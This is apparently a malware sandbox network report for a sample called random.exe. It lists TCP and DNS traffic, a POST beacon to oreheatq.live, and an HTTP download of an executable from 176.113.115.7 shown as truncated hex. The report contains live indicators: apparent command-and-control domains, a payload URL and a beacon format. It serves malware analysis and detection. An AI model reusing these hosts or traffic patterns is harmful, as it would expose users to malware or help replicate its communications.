Mar 29, 2025 14:24:09.715778112 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:09.715809107 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:09.715831041 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:09.715862989 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:09.715996027 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:09.794420958 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:09.794452906 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:09.794667006 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:09.939306021 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:09.939326048 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:09.939349890 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:09.939361095 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:09.939382076 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:09.939393044 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:09.939404011 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:09.939439058 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.022517920 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.022547007 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.022831917 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.165618896 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.165641069 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.165760040 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.165761948 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.165771961 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.165803909 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.165869951 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.165924072 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.247083902 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.247106075 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.247246981 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.398935080 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.398957968 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.398992062 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.399012089 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.399035931 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.399058104 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.399060011 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.399106026 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.478671074 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.478709936 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.478846073 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.629980087 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.630012989 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.630033016 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.630055904 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.630074978 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.630083084 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.630099058 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.630105972 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.630156040 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.711535931 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.711570024 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.711802959 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.857783079 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.857858896 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.857976913 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.857990980 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.858004093 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.858025074 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.858037949 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.858055115 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.858083010 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.941556931 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.941751003 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.941778898 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:10.941900015 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:10.991884947 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:11.223453999 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:11.223572016 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:11.450057983 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:11.450190067 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:11.471465111 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:11.471494913 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:11.471618891 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:11.475846052 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:11.678929090 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:11.679012060 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:11.679171085 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:11.679215908 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:11.705749035 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:11.705776930 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:11.705849886 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:11.705887079 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:11.710522890 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:11.710568905 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:11.710597992 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:11.757472038 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:11.941924095 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:11.942091942 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:11.988543034 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:11.988651037 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:12.176384926 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:12.176537991 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:12.218269110 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:12.218358040 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:12.233540058 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:12.233563900 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:12.233653069 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:12.405076981 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:12.405137062 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:12.451596022 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:12.507484913 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:12.634511948 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:12.634696007 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:12.738975048 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:12.739130020 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:12.863187075 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:12.863380909 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:12.975980043 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:12.976058006 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:13.093928099 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:13.148204088 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:13.208642960 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:13.257551908 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:13.380588055 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:13.380610943 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:13.380925894 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:13.616889000 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:13.616904020 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:13.617014885 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:13.856389046 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:13.856410027 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:13.856534004 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:13.898145914 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:14.127837896 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:14.127861977 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:14.127952099 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:14.357530117 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:14.357563972 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:14.357728004 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:14.382697105 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:14.382824898 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:14.585520029 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:14.612782001 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:14.612848997 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:14.742569923 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:14.838196993 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:14.838243961 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:14.838268042 CET	80	49688	176.113.115.7	192.168.2.7
Mar 29, 2025 14:24:14.838284016 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:14.838315010 CET	49688	80	192.168.2.7	176.113.115.7
Mar 29, 2025 14:24:14.838315010 CET	49688	80	192.168.2.7	176.113.115.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2025 14:23:14.766433954 CET	57210	53	192.168.2.7	1.1.1.1
Mar 29, 2025 14:23:15.757556915 CET	57210	53	192.168.2.7	1.1.1.1
Mar 29, 2025 14:23:15.857106924 CET	53	57210	1.1.1.1	192.168.2.7
Mar 29, 2025 14:23:15.860119104 CET	55464	53	192.168.2.7	1.1.1.1
Mar 29, 2025 14:23:15.995986938 CET	53	55464	1.1.1.1	192.168.2.7
Mar 29, 2025 14:23:57.556302071 CET	53	57811	162.159.36.2	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 29, 2025 14:23:14.766433954 CET	192.168.2.7	1.1.1.1	0x7f6e	Standard query (0)	wxayfarer.live	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:23:15.757556915 CET	192.168.2.7	1.1.1.1	0x7f6e	Standard query (0)	wxayfarer.live	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:23:15.860119104 CET	192.168.2.7	1.1.1.1	0xd440	Standard query (0)	oreheatq.live	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 29, 2025 14:23:15.857106924 CET	1.1.1.1	192.168.2.7	0x7f6e	Name error (3)	wxayfarer.live	none	none	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:23:15.995986938 CET	1.1.1.1	192.168.2.7	0xd440	No error (0)	oreheatq.live		172.67.172.183	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:23:15.995986938 CET	1.1.1.1	192.168.2.7	0xd440	No error (0)	oreheatq.live		104.21.30.96	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

oreheatq.live

176.113.115.7

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49688	176.113.115.7	80	6160	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
Mar 29, 2025 14:23:26.137291908 CET	78	OUT	GET /mine/random.exe HTTP/1.1 Connection: Keep-Alive Host: 176.113.115.7
Mar 29, 2025 14:23:26.370755911 CET	1031	IN	HTTP/1.1 200 OK Date: Sat, 29 Mar 2025 13:23:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sat, 29 Mar 2025 13:18:14 GMT ETag: "1c6400-6317b04fd38f9" Accept-Ranges: bytes Content-Length: 1860608 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 30 4a 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)/,(,/,),,(,-,-g,Y%,Y,Y.,Rich,PEL#g0J@`J!]@WkD0JJ @.rsrcD@.idata @ )@vyhhgzxiP0P@okzpskpe J
Mar 29, 2025 14:23:26.370768070 CET	1031	IN	Data Raw: 04 00 00 00 3e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4a 00 00 22 00 00 00 42 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: >@.taggant00J"B@
Mar 29, 2025 14:23:26.370779037 CET	1031	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 29, 2025 14:23:26.370790958 CET	1031	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 29, 2025 14:23:26.370800972 CET	1031	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 29, 2025 14:23:26.370811939 CET	1031	IN	Data Raw: 90 03 77 c9 7c 04 de 90 e5 48 5e ce b0 05 95 ee ae 64 77 70 50 51 77 d6 db a6 74 7a 9c 73 de 50 f2 1b 66 2e f1 b4 cd ae 6b bc 9d fa b0 5a 83 b1 8c fc 97 76 e1 b9 34 72 8c 84 9b 10 99 d4 2d ee 8e e0 c3 ac 2b a6 a5 4a 96 1a 76 ce 4c b6 71 de 7e 33 Data Ascii: w\|H^dwpPQwtzsPf.kZv4r-+JvLq~3gu^r\|6`b~h%@v:}Gr6L~zLefiz2Ksv\\|yrt)M8{]\|xmDr7v6v:Jxt
Mar 29, 2025 14:23:26.370821953 CET	1031	IN	Data Raw: b1 4c b5 75 8c 4c 0d 78 69 8b d6 e5 8b 32 79 e6 8b 50 07 68 49 7e 84 5e 10 f4 24 f6 ee 60 09 9e 29 af e4 50 8e f2 d0 05 ee 8e c0 cb ac 0b 14 da ac d2 24 45 8c 68 14 ad 01 03 55 d7 7a b3 a2 76 3a 7d cb 0a fc 9c 54 d8 ba a8 03 7a b9 8d c4 52 7c 82 Data Ascii: LuLxi2yPhI~^$`)P$EhUzv:}TzR\|M91t$b)=i9wk XbfV)z]5}n-={rpz==%&%1yXfZ"YhZqkWW-yVWRd-U4je
Mar 29, 2025 14:23:26.370834112 CET	1031	IN	Data Raw: 22 0d 12 1c 6f bd b0 ec 77 ec 40 c4 7b c1 18 05 e1 63 8a 1d d3 4a b6 d7 65 ed fc 5c a6 73 81 7c 34 71 9b f9 49 f5 94 07 45 e8 b1 2f 1c 12 f8 ec 2d 07 7f 08 9a 79 6f 70 96 2c 98 55 d9 62 83 96 c7 8a 89 69 d2 82 66 a5 9b 42 27 11 90 03 5e 9b 1d 79 Data Ascii: "ow@{cJe\s\|4qIE/-yop,UbifB'^yX]02Wk]X\|pP>/r>fo0"l\B,u\1pc?m\&i3knr1z^k>08~fvU}uy_EtLw0\|
Mar 29, 2025 14:23:26.370846033 CET	1031	IN	Data Raw: 6f ca e6 d8 05 a2 2c ee 84 e3 c9 56 ab 64 f4 6f a3 06 75 aa 49 98 a9 73 b9 24 ec 69 4e 59 fb 11 5b 99 80 a7 4b b0 f5 6c 17 54 6c e1 ba e2 92 e3 c8 46 95 61 f1 e9 f9 e1 d8 f7 30 b4 f8 16 09 76 34 fd 2d 16 b7 63 38 88 2d 1e 69 b1 6b 57 3c 7c 55 57 Data Ascii: o,VdouIs$iNY[KlTlFa0v4-c8-ikW<\|UWk_ftmx<rEF_sTJzY'Z[-Ks[X<ot_qY8^o^fWtOn6Vz%TYbqzXcUoo
Mar 29, 2025 14:23:26.370857954 CET	1031	IN	Data Raw: ed b7 e2 c8 bc dd 3a 4e 81 e7 e7 ac 84 7c 65 b2 d4 21 99 d3 94 5a b7 ee c0 9c 61 fa e0 dd ad e5 f6 f0 91 ce aa ca bb d7 f5 c6 61 ab e3 0f b2 03 7f f4 91 ce 74 17 ae 35 9b b6 18 aa b3 c5 f1 11 b2 a4 78 79 74 8e 78 dd 22 2a 6f a4 15 d0 59 7a f2 50 Data Ascii: :N\|e!Zaat5xytx"*oYzPz)t4Y" 58i{Vqtspje/GM-ccW1)gW;Zj##\}ijl4Euoxyt]v)1YZ9
Mar 29, 2025 14:23:26.602014065 CET	1031	IN	Data Raw: 6a 3b 49 e3 e4 74 35 dd 4e 01 a7 0d 3e 95 44 f4 50 9d 25 cf 76 b9 50 76 3e dd fe 0f f1 90 1f 4a f0 7e 74 6c 09 49 7d 5b 35 d5 68 1c 52 b2 ea fd 98 b8 55 81 6e 54 f2 90 0c 33 af 6c 79 f0 e6 49 44 7e 69 ef 0b 0e 7e 92 0a 9a 78 b2 42 1d b5 39 34 d2 Data Ascii: j;It5N>DP%vPv>J~tlI}[5hRUnT3lyID~i~xB941.Ze.~7GRJ}cdUT7Ly%r0SlpWz3{e0#}-sP%c7Bu}Q<`3aE9@x,cihvum{X

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49681	172.67.172.183	443	6160	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-29 13:23:16 UTC	263	OUT	POST /gsopp HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 51 Host: oreheatq.live
2025-03-29 13:23:16 UTC	51	OUT	Data Raw: 75 69 64 3d 63 38 31 33 33 30 30 66 37 36 32 65 30 66 36 63 39 30 37 61 34 30 65 32 62 33 32 39 61 36 30 35 33 36 32 39 38 31 38 31 65 39 26 63 69 64 3d Data Ascii: uid=c813300f762e0f6c907a40e2b329a60536298181e9&cid=
2025-03-29 13:23:16 UTC	782	IN	HTTP/1.1 200 OK Date: Sat, 29 Mar 2025 13:23:16 GMT Content-Type: application/octet-stream Content-Length: 33671 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Inu%2FUpa8dNJUsNS10gclg%2BgnHqhD%2BUCk4NPgqSY8%2Fy0Xh16nX1ARuIuvbXT1LiSaoeIIV8ZH8Y4EdoBZ9xHHmOlp7KKkUTTnBexJhW2WQcoAnMahLCjNbi2TwOOdHRL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 927fae4b8a0660e6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=105446&min_rtt=101400&rtt_var=27473&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=950&delivery_rate=26890&cwnd=252&unsent_bytes=0&cid=ffb64bf5dab862ad&ts=643&x=0"
2025-03-29 13:23:16 UTC	587	IN	Data Raw: 66 62 c9 5d aa 23 ab fe 94 9e 2a 50 77 94 bb 29 0d 9f 3f ca 1f 06 52 65 e3 91 3a 90 bd 89 eb 62 1e 4f c7 1c f6 64 e6 12 e6 81 27 88 a6 2d 9c 55 27 ab 95 be ee cf a5 be d7 32 50 7b 14 dd 01 c6 c1 9a 2c 21 82 b1 e5 94 0a c5 c3 30 1b e8 46 d8 e3 b1 aa ad 35 9c 7a 4c 25 4a 48 72 ee 24 16 62 13 44 44 5e 8e bc 5a 1b 74 e2 95 c9 20 58 33 8a a5 2e b2 96 67 6d 12 66 d6 2b 14 41 a4 1a ae 2c c6 75 58 66 f1 55 2e c1 b4 92 1d 3f c3 4a 3b d2 d4 e6 df 21 55 44 d4 6c 3f 98 21 03 ab 29 23 d9 92 79 27 1f 9c 2a 41 cb 12 cd 50 22 b1 b4 f0 fa 35 3d fa 59 c0 b1 53 6f 22 fc 3b af 7f fa e8 5f 25 d5 53 5d 37 b1 ce a5 36 5e 78 ab 1d cf dc a6 56 b2 d4 52 e4 67 e1 81 3a 91 da 7c 40 6f d0 04 e3 2b 4d 6f ce 58 40 cc 6e 4f b3 40 9d 87 5c dc 41 f3 d0 f5 3e c4 93 58 71 da 64 6f ae 91 24 Data Ascii: fb]#Pw)?Re:bOd'-U'2P{,!0F5zL%JHr$bDD^Zt X3.gmf+A,uXfU.?J;!UDl?!)#y'AP"5=YSo";_%S]76^xVRg:\|@o+MoX@nO@\A>Xqdo$
2025-03-29 13:23:16 UTC	1369	IN	Data Raw: 4a c4 2e 24 8c 52 d4 82 4d b4 64 b3 20 6e 4a eb 42 8e fd 50 3a 1d 2f 52 d7 e2 a5 2b 21 fa 81 56 42 ff e0 98 18 2b d1 14 03 a0 39 15 58 8f 20 57 58 e6 d2 4d 6f 1e a4 59 b8 e7 10 1d 6b 0e c5 56 c7 bc f5 8a 8a 62 63 9c c3 3b 96 2e c1 61 84 79 ea c5 69 b2 a8 69 b6 3c fa a2 2d 78 26 cc f6 1d a9 7c 97 a2 dc fd 4c 68 28 48 18 d0 6c 93 38 69 4d ce 7e 84 04 cf 9e 53 91 29 a7 d4 ce b0 4b 30 90 fc 7b b8 f0 cc fb fe c9 d7 6c 57 a8 26 f7 34 af dd cc 2a 1e f1 d6 26 a3 8e 4b 8e ff e0 8d 23 45 10 9a f3 1b f3 c7 08 38 52 57 f2 d8 2e 32 41 d4 fb 7a d4 c8 0b 8c 63 b1 95 19 71 99 16 fd c3 e4 7e 17 89 cf f3 77 1e 5c e7 ef 0d 52 0d 57 a8 d7 65 95 fe 30 b8 c1 19 65 51 cc ed 18 4e 1e cb ce 66 ed e5 6c 4c 08 e9 8b dd 15 6b 10 b3 c8 e5 b2 9a f5 98 b0 21 44 ce d6 7a 81 39 1a ca ec Data Ascii: J.$RMd nJBP:/R+!VB+9X WXMoYkVbc;.ayii<-x&\|Lh(Hl8iM~S)K0{lW&4*&K#E8RW.2Azcq~w\RWe0eQNflLk!Dz9
2025-03-29 13:23:16 UTC	1369	IN	Data Raw: 8d 31 0c 14 c4 ec cf 7a da 08 56 34 91 ae b0 33 ef 7c 7f ed e6 98 87 18 81 d9 8f ac aa 01 4f fa a9 c5 06 4a 62 cc ea d5 12 e4 70 a3 32 77 8c 42 1f 0b 44 ef c5 cc 6d 28 35 6f 17 8b f2 1e 72 69 9a 11 ef 96 f7 ea e2 fc 09 ee e4 7f c7 30 57 94 f1 c4 fc 65 11 0d e0 8c 1a ba c6 85 d0 b8 42 7a 63 d0 a8 91 aa 30 ac bb c6 f2 3a f3 cd dc 8a 4f e9 e8 39 9b d6 9a 42 a0 c2 17 21 e1 69 cf ab 40 bd 03 16 f0 06 79 7f bd 2d 9b 11 09 a1 d0 30 5c 55 31 b9 2d 61 9f d1 15 32 7c 4f 2a 90 39 7b 3d a7 d5 3d 25 60 de 6c 2f e2 4d d0 d3 1b 1f b5 7f 39 49 ed 10 1a de 03 cf 60 94 09 c6 79 49 94 59 4a 94 9f 37 3f a9 5f 6b fe 84 9a bd 2a 71 94 78 31 22 1c 94 99 f2 82 66 8b 6a e6 1b 5f 44 53 32 64 44 d9 c9 12 75 b5 8a ad b1 54 1f 62 b3 37 a2 e4 c7 92 69 13 fd 8d 36 ff 02 19 dd fc e4 89 Data Ascii: 1zV43\|OJbp2wBDm(5ori0WeBzc0:O9B!i@y-0\U1-a2\|O9{==%`l/M9I`yIYJ7?_kqx1"fj_DS2dDuTb7i6
